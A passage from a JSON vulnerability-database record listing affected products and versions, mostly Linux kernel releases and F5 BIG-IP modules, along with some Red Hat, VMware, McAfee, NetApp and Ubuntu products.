        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "big-ip aam hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5.11.5.1"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "container service extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "data exchange layer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "5.0"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "big-ip apm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "linux esm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "vrealize code stream",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "threat intelligence exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "unified access gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.6"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "big-ip gtm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip ltm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.4"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "vcenter server appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "big-ip aam hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "active iq performance analytics services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "active response",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.0"
      },
      {
        "model": "big-ip ltm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.3.3"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.60"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "data exchange layer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.0"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "storagegrid9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "vrealize operations manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip webaccelerator hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip apm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "storage replication adapter for clustered data ontap for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "big-ip analytics hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "sd-wan edge by velocloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "big-ip ltm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "vcenter server appliance 6.5u3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": null
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "big-ip dns hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "openshift container platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "big-ip dns hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip link controller build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "mrg realtime",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "horizon",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
